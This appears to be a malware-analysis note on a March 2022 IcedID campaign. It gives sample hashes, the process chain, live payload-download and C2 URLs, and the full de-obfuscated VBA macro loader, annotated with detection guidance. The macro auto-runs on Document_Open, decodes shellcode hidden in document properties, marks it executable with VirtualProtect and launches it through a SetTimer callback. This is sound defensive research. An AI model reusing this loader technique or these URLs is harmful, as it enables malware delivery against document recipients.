icedID_22.03.2022.txt
IcedID | 22.03.2022 | Campaign 1832122140
***************************************
.doc 0f3ea635c48dba38f3602aa302e2581fef545372e81a5e372d68ca709f2db7f9
.doc c19c503511f574ffb7bebeb8985561e06101719c935fc9f61dd9960483d5bfd8
.dll 98b3471ac865e7cc6cc5712ab0db76c476fd861828267284a6aa40c802737b2e
***************************************
Exec >> .doc > .dll
WINWORD.EXE /n C:\Users\Admin\AppData\Local\Temp\request.docm
http://documentseu.top/kdv/FzxkjAN7rH2wzjPOcJ9iIa81gr2-znNH9wfxw14Q/
http://documentseu.top/kdv/khxOqk77P1SsQQIgOJc07dm-FoL9L0eZKwyaYc3p/
C:\Windows\splwow64.exe 12288
rundll32 C:\Users\Admin\AppData\Local\Temp\y3B5C.tmp.dll,DllRegisterServer
rundll32 C:\Users\Admin\AppData\Local\Temp\y3B5C.tmp.dll",DllRegisterServer
C:\Windows\system32\WerFault.exe -u -p 988 -s 168
C2:
http://golinisye.top/
***************************************
oledump.py -s 3 -v request.doc
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes from the oledump stream: VB_Name = "ThisDocument" means this is the
' document's own class module, which is why the Document_Open handler below fires
' automatically once macros are enabled.
' Win32 imports hidden behind random-word function names. The real API is only visible in
' the Alias clause (SetTimer, KillTimer, VirtualProtect); YARA/hunting rules should key on
' the Alias strings and the Lib names, not on the declared identifiers, which change per build.
#If VBA7 Then
' 64-bit-capable declarations (PtrSafe / LongPtr) used by Office 2010 and later.
Private Declare PtrSafe Function UnperceptualSurgical Lib "user32" Alias "SetTimer" (ByVal CeciliaSubventralQuodlibetarian As LongPtr, ByVal AndropetalarSeparationismTransiliac As LongPtr, ByVal ExaggeratinglySaintism As LongPtr, ByVal CordewaneCourtierism As LongPtr) As LongPtr
Private Declare PtrSafe Function NitpickersUnintombed Lib "user32" Alias "KillTimer" (ByVal ThirdlyKopagmiut As LongPtr, ByVal NondisarmamentShrivellingTemptingness As LongPtr) As LongPtr
' Fourth VirtualProtect parameter (old protection) is ByRef here, not ByVal.
Private Declare PtrSafe Function ProofreadingFallalery Lib "kernel32" Alias "VirtualProtect" (ByVal CarburizeEudemonistically As LongPtr, ByVal UntritelyKinetomeric As LongPtr, ByVal MedallaryTimeworkerJinrikisha As LongPtr, MatronaliaGigantostracous As LongPtr) As LongPtr
#Else
' Legacy 32-bit declarations for pre-VBA7 hosts; same three APIs, Long instead of LongPtr.
Private Declare Function UnperceptualSurgical Lib "user32" Alias "SetTimer" ( ByVal ChoreographySistrurusUnintoxicating As Long, ByVal VerbenasApennines As Long, ByVal BrominHalicarnassian As Long, ByVal WantonerAraliaceousGadolinia As Any) As Long
Private Declare Function NitpickersUnintombed Lib "user32" Alias "KillTimer" ( ByVal SubnarcoticPseudoaestheticSniggeringly As Long, ByVal ThromboclasisWondercraft As Long) As Long
Private Declare Function ProofreadingFallalery Lib "kernel32" Alias "VirtualProtect" (ByVal OverpiousnessDividedly As Long, ByVal SclerificationDelocalizationWhinnel As Long, ByVal SailfishLententideHeavyset As Long, NarcobatusUpsilons As Long) As Long
#End If
' Auto-execution entry point: Word invokes Document_Open when the document is opened with
' macros enabled. It does nothing itself except call the loader routine, so the whole
' chain is reachable without any further user interaction.
Private Sub Document_Open()
AntisidericCretinBonhomie
End Sub
' String-resolver: reads the custom document property named strInput and returns its value
' reversed. Every string the macro needs (object names, environment keys, the payload
' property key, the hex prefix) lives in CustomDocumentProperties rather than in the VBA
' stream, so the code alone shows only lookup keys; recover the real strings from the
' document's property streams (e.g. with oledump/olemeta) when triaging a sample.
Public Function hoCHrGBZH(strInput)
hoCHrGBZH = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
' Loader routine, called from Document_Open.
' Observed flow: decode a hex payload stored in a built-in document property into a Byte
' array -> VirtualProtect the array with 64 (PAGE_EXECUTE_READWRITE) -> set an environment
' variable via a GetObject(...).Environment collection -> register the array's address as
' a SetTimer callback -> pump messages for ~1 s -> KillTimer -> remove the environment
' variable -> discard the array. Detection angles: WINWORD.EXE obtaining RWX memory,
' user32!SetTimer with a non-module callback address, and the child rundll32 ...
' ,DllRegisterServer seen in the process tree above.
Private Sub AntisidericCretinBonhomie()
Dim EndorserMavourneen() As Byte
' Payload is picked by host bitness; the BuiltInDocumentProperties key is itself a
' reversed custom property, so it is not visible in the VBA stream.
#If Win64 Then
EndorserMavourneen = RenovizeSpectrophotometerPsoai(ActiveDocument.BuiltInDocumentProperties(hoCHrGBZH("ZTaqhc9jX")).Value)
#Else
EndorserMavourneen = RenovizeSpectrophotometerPsoai(ActiveDocument.BuiltInDocumentProperties(hoCHrGBZH("gIU5oWu8r")).Value)
#End If
#If VBA7 Then
Dim ColostomiesExcitesAnalogions As LongPtr ' intended to receive the previous page protection
Dim StayableTitanosilicate As LongPtr ' payload length in bytes
Dim shellCode As LongPtr ' address of the first payload byte
Dim ExpatiationMonorailroad As LongPtr ' timer id returned by SetTimer
#Else
Dim ColostomiesExcitesAnalogions As Long
Dim StayableTitanosilicate As Long
Dim shellCode As Long
Dim ExpatiationMonorailroad As Long
#End If
' Length = UBound + 1. RenovizeSpectrophotometerPsoai sizes the array to the hex string
' length but fills only half of it, so this length (and the VirtualProtect range) also
' covers the zero-filled tail.
StayableTitanosilicate = UBound(EndorserMavourneen) + 1
shellCode = VarPtr(EndorserMavourneen(0))
' VirtualProtect(addr, len, 64, oldProtect): 64 = PAGE_EXECUTE_READWRITE. Note the last
' parameter is ByRef and a VarPtr value is passed, so the old protection lands in a VBA
' temporary, not in ColostomiesExcitesAnalogions; the value is never read anyway.
ProofreadingFallalery shellCode, StayableTitanosilicate, 64, VarPtr(ColostomiesExcitesAnalogions)
' Sets a process environment variable: object name, collection name, key and value all
' come from document properties (presumably a WScript.Shell-style object - confirm from
' the recovered property values). Likely a parameter handed to the next stage.
GetObject(hoCHrGBZH("zFrJxQ__yDJx")).Environment(hoCHrGBZH("vcDz__"))(hoCHrGBZH("WqQLObjnCSb")) = hoCHrGBZH("q2rYW_M")
' SetTimer(hWnd=0, nIDEvent=buffer address, uElapse=1, lpTimerFunc=buffer address):
' the decoded bytes are installed as the timer procedure, so the transfer of control
' happens from the message loop rather than via a direct call from VBA.
ExpatiationMonorailroad = UnperceptualSurgical(0, shellCode, 1, shellCode)
' Spin with DoEvents for 1 second so the queued timer message is dispatched.
UndeludingSectionality 1
' Tear-down: KillTimer, remove the environment variable, and reallocate the array
' (ReDim without Preserve drops its contents) to reduce in-memory artefacts.
NitpickersUnintombed 0, ExpatiationMonorailroad
GetObject(hoCHrGBZH("gwNLW1Bay4")).Environment(hoCHrGBZH("ScmozQXgoo4ly")).Remove (hoCHrGBZH("cKK3lrHG"))
ReDim EndorserMavourneen(1)
End Sub
' Busy-wait for `Finish` seconds while pumping the message queue. DoEvents is the essential
' part: it lets the SetTimer callback registered by the caller be dispatched. Timer() is
' seconds since midnight truncated to Long here, so the deadline wraps at midnight (edge
' case irrelevant to the sample's behaviour).
Sub UndeludingSectionality(Finish)
Dim HypothecatingSickle As Long
Dim ChorepiscopeQuotiesTorsks As Long
ChorepiscopeQuotiesTorsks = Timer() + (Finish)
Do
HypothecatingSickle = Timer()
DoEvents
Loop Until HypothecatingSickle > ChorepiscopeQuotiesTorsks
End Sub
' Returns the single character at zero-based position ReaccumulatingCyanids of the string
' (Mid is 1-based, hence the +1). Used by the hex decoder to pull one nibble character.
Function HackberriesZaninesses(AnatomicobiologicalRattlyPharyngopathy, ReaccumulatingCyanids)
HackberriesZaninesses = Mid(AnatomicobiologicalRattlyPharyngopathy, ReaccumulatingCyanids + 1, 1)
End Function
' Effectively returns Len(input). The If is an opaque predicate: Rnd with a positive
' argument yields a value in [0, 1), so Int(Rnd(23)) is always 0 and `0 > 2` never holds.
' The 9000 branch is dead code intended to confuse static analysis and emulators, not a
' real length - treat this function as Len() when reconstructing the decoder.
Function FrostinessHomotonousCalmingly(FirebratsIdolisedUnerrableness) As Long
If Int(Rnd(23)) > 2 Then
FrostinessHomotonousCalmingly = 9000
Else
FrostinessHomotonousCalmingly = Len(FirebratsIdolisedUnerrableness)
End If
End Function
' Decodes a hex-character string into a Byte array. Each two-character pair is prefixed
' with a string assembled from two reversed custom document properties (presumably a
' numeric-literal prefix such as "&H" - the property values are not in this dump, confirm
' from the document) and converted with CDec. The array is ReDim'd to Len(input) entries
' but only Len/2 are written, so the trailing half stays zero-filled; the caller's length
' and VirtualProtect range therefore include that padding.
Function RenovizeSpectrophotometerPsoai(AlgesiometerFerrotungstenScleria)
' FrostinessHomotonousCalmingly(x) is Len(x) in practice (its other branch is unreachable).
ReDim ShotmakerBumbler(FrostinessHomotonousCalmingly(AlgesiometerFerrotungstenScleria) - 1) As Byte
Dim EnharmonicCompunctionaryCichlidae As Long, BromomenorrheaUndefiniteQuadraphonics As Long
' Prefix string built from two custom properties via the reversing resolver.
Dim AxiomaticalNondeprecatingly: AxiomaticalNondeprecatingly = hoCHrGBZH("ePyzXTjr") & hoCHrGBZH("vq4yNZ0riO")
' Step 2: consume two characters (one byte) per iteration.
For EnharmonicCompunctionaryCichlidae = 0 To FrostinessHomotonousCalmingly(AlgesiometerFerrotungstenScleria) - 1 Step 2
' Output index; exact because the loop index is always even.
BromomenorrheaUndefiniteQuadraphonics = EnharmonicCompunctionaryCichlidae / 2
ShotmakerBumbler(BromomenorrheaUndefiniteQuadraphonics) = CDec(AxiomaticalNondeprecatingly & HackberriesZaninesses(AlgesiometerFerrotungstenScleria, EnharmonicCompunctionaryCichlidae) & HackberriesZaninesses(AlgesiometerFerrotungstenScleria, EnharmonicCompunctionaryCichlidae + 1))
Next
RenovizeSpectrophotometerPsoai = ShotmakerBumbler
End Function